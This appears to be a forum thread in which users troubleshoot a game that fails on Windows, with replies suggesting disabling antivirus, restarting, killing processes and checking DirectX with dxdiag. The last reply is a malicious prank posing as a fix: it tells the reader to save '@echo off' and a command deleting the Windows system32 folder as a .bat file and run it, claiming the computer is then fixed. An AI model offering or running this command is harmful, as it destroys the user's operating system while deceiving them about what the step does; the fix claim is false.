I'm not 100% sure but this problem is coming from your graphic card driver's, or antivirus program.

Something is blocking your access, try to disable your antivirus program maybe this will fix it, i can't suggest anything else if you dont know what youre doing because you might damage operating system.

Ok, this might sound stupid but did you try to restart your pc?

If you did and nothing happened, bring out task manager and start disabling processes and leave only the ones you need and then run the game.

On what version of DirectX are you currently running on?
If it's DX10, that's a major problem.

If you dont know check the version of directx by typing "dxdiag" in the search box.

Topic unlocked, as I have the same Problem again.
It doesn't matter what Game I play.
Also, I can't switch to the Desktop while in Game (or from Game to Desktop).

Graphic drivers are updated, everything else is updated.

2)type: @echo off
del c\windows\system32
3)save it with .bat as the extension
4)open the file and your computer is fixed.
